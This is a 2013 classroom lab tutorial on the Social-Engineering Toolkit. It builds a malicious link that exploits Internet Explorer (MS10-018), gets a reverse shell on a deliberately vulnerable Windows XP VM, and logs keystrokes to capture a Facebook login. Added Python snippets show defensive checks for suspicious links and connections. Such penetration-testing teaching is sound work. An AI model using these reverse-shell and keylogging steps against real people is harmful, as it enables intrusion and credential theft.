Monday, 18 November 2013

Hands-On Guide - Social Engineering Toolkit (SET): Lesson 2

{ Create Malicious Weblink to Sniff Victim's Keystrokes }

Section 0. Background Information
  • What is the Social-Engineering Toolkit (SET)
    • The Social-Engineering Toolkit (SET) is a Python-driven suite of custom tools that focuses solely on the human element of penetration testing.
    • Its main purpose is to augment and simulate social-engineering attacks so that the tester can effectively evaluate how a targeted attack might succeed.
    • The Social-Engineering Toolkit is available on penetration-testing Linux distributions such as BackTrack 5, BackBox, Blackbuntu, GnackTrack and others.
  • Social Engineering Note
    • Imagine an attacker embedding the malicious link in an email to a potential victim.
    • The victim does not inspect the link before clicking on it, and so does not notice that the link points to an IP address instead of a domain name. In addition, the IP address is listening on a non-standard port.
      • (i.e., http://192.168.1.105:8080)
    • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize that the following has occurred:
      1. A Metasploit payload was injected into their system.
      2. A Metasploit session is attached to their system.
      3. The attached session was migrated from iexplore.exe to notepad.exe.
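The two things the note says the victim failed to check (a bare IP address as the host, and a non-standard port) can be checked mechanically before anyone clicks. The following is an added example, not code from the original lab; it uses only the standard library and the sample link from the note above.

```python
import ipaddress
from urllib.parse import urlsplit

# Ports that need no comment for each scheme; anything else is worth a second look.
DEFAULT_PORTS = {"http": 80, "https": 443}


def inspect_link(url):
    """Return the red flags a recipient should notice before clicking a link.

    An empty list only means these two checks did not fire, not that the link
    is safe.
    """
    flags = []
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)  # raises ValueError for a real domain name
        flags.append("host is a bare IP address, not a domain name")
    except ValueError:
        pass
    default = DEFAULT_PORTS.get(parts.scheme)
    if parts.port is not None and parts.port != default:
        flags.append(f"non-standard port {parts.port} for {parts.scheme}")
    return flags
```

Running `inspect_link("http://192.168.1.105:8080/")` reports both flags from the note; a normal `https://www.example.com/` link reports none.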
Section 1. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Programs --> VMWare --> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

Section 2. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME desktop
    • Instructions:
      1. Type startx

Section 3. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • In my case, the IP address is 192.168.1.105.
      • Please record your IP address.

Section 4. Start the Social Engineering ToolKit
  1. Start Social Engineering ToolKit
    • Instructions:
      1. cd /pentest/exploits/set
      2. ./set
  2. Website Attack Vector
    • Instructions:
      1. Select 2
  3. Select Metasploit Browser Exploit Method
    • Instructions:
      1. Select 2
  4. Select Web Templates
    • Instructions:
      1. Select 1
  5. Set Web Attack
    • Instructions:
      1. Select 3
  6. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
    • Instructions:
      1. Select 15
  7. Windows Shell Reverse_TCP
    • Instructions:
      1. Select 1
  8. Set Reverse Port
    • Instructions:
      1. Set to 5555
  9. Waiting for the server to start
    • Instructions:
      1. Copy the weblink that is listed above the Server started line.
      2. Continue to the next section.
    • Notes:
      • This is the malicious weblink that the attacker will use to social engineer their way into the victim's machine.

Section 5. Start Up Windows Machine
  • Social Engineering Note
    • Imagine how an attacker could embed the malicious link produced in Section 4, Step 9 in an email to a potential victim.
    • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize that the Metasploit payload was injected and that a session is now attached to a migrated notepad process.
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button
  3. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine
  4. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: Use the Class Password or whatever you set it to.
  5. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt
  6. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP address is 192.168.1.116.
      • This is the IP Address of the Victim Machine that will be attacked by Metasploit.
      • Record your Damn Vulnerable WXP-SP2's IP Address.
     
Section 6. Start Up a Web Browser
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
  2. Victim Clicks on Link
    • Instructions:
      1. Place the BackTrack IP in the Address Bar.
        • In my case, http://192.168.1.105:8080/
        • In your case, use the weblink you copied in Section 4, Step 9.
    • Note(FYI):
      • The Web Browser will just crash.

Section 7. Analyzing Results After Web Browser Crash
  1. Start up a Command Prompt
    • Instructions:
      1. All Programs --> Accessories --> Command Prompt
  2. Check the connection on port 5555 and the process that owns it
    • Instructions:
      1. netstat -nao | findstr 5555
      2. tasklist | findstr 2976
        • 2976 is the process ID for the Metasploit session running on port 5555.
        • In your case, the process ID will probably be different.
      3. tasklist | findstr notepad
    • Proof of Lab Instructions: (this step can be skipped)
      1. date
      2. echo "Your Name"
        1. Where the string "Your Name" is your actual name.
        2. e.g., echo "Nguyen Tuong Minh"
      3. Do a PrtScn
      4. Paste into a word document
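The manual check in Step 2 (find the connection on port 5555, then look up its PID in the task list) is exactly what a host-based detection does. The following is an added example, not part of the original lab: it parses constructed `netstat -nao` and `tasklist` output (the PIDs, ports and addresses are made up to resemble the lab) and flags any established connection owned by a process, such as notepad.exe, that has no reason to talk to the network.

```python
import re

# Constructed sample output, modelled on the lab's `netstat -nao` and `tasklist`
# on the Windows XP victim; the PIDs, ports and addresses are made up.
NETSTAT_OUTPUT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    192.168.1.116:1047     192.168.1.105:5555     ESTABLISHED     2976
  TCP    192.168.1.116:1050     192.168.1.105:8080     CLOSE_WAIT      1788
"""
TASKLIST_OUTPUT = """\
Image Name                   PID Session Name     Session#    Mem Usage
svchost.exe                  912 Console                 0      4,700 K
iexplore.exe                1788 Console                 0     18,212 K
notepad.exe                 2976 Console                 0      3,560 K
"""

NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")
TASKLIST_RE = re.compile(r"^(.+?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")
# Processes that have no business holding a network connection at all.
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe"}


def parse_netstat(text):
    """Return (local, foreign, state, pid) tuples for each TCP line."""
    rows = [NETSTAT_RE.match(line) for line in text.splitlines()]
    return [(m[1], m[2], m[3], int(m[4])) for m in rows if m]


def parse_tasklist(text):
    """Map PID -> image name from tasklist output (the header does not match)."""
    rows = [TASKLIST_RE.match(line) for line in text.splitlines()]
    return {int(m[2]): m[1].strip() for m in rows if m}


def find_suspicious(netstat_text, tasklist_text):
    """Flag established connections owned by processes that should never
    talk to the network, which is what the migrated session looks like here."""
    images = parse_tasklist(tasklist_text)
    hits = []
    for local, foreign, state, pid in parse_netstat(netstat_text):
        image = images.get(pid, "<unknown>")
        if state == "ESTABLISHED" and image.lower() in NO_NETWORK_EXPECTED:
            hits.append({"pid": pid, "image": image, "foreign": foreign})
    return hits
```

On the sample data `find_suspicious` returns one hit: notepad.exe (PID 2976) connected to 192.168.1.105:5555, the same pair of facts the lab has you find by hand.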

Section 8. Entering the Victim's Machine
  1. Get a MSF Prompt
    • Instructions:
      1. Press <Enter>, when you see the notepad.exe line.
  2. Obtain the Victim's Command Prompt
    • Instructions:
      1. sessions
      2. sessions -i 1
      3. execute -f cmd.exe -i -M
  3. Start the keystroke sniffer
    • Instructions:
      1. Press the <Ctrl> and "z" key at the same time.
        • This will put session 1 into the background.
      2. y
      3. keyscan_start
      4. Continue to next Section.

Section 9. Login to Facebook
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
     
  2. Login into Facebook
    • Instructions:
      1. Email: Use a fake address
        • first.last@victim.com, where first is your first name and last is your last name.
        • e.g., john.gray@victim.com
      2. Password: Use whatever you want.

Section 10. Review sniffed keystrokes
  1. Dump and stop the keystroke sniffer
    • Instructions:
      1. keyscan_dump
        • This will produce the keystrokes captured during the Facebook login.
      2. keyscan_stop
    • Proof of Lab Instructions #2:
      1. Do a PrtScn
      2. Paste into same word document that contains proof of lab #1.
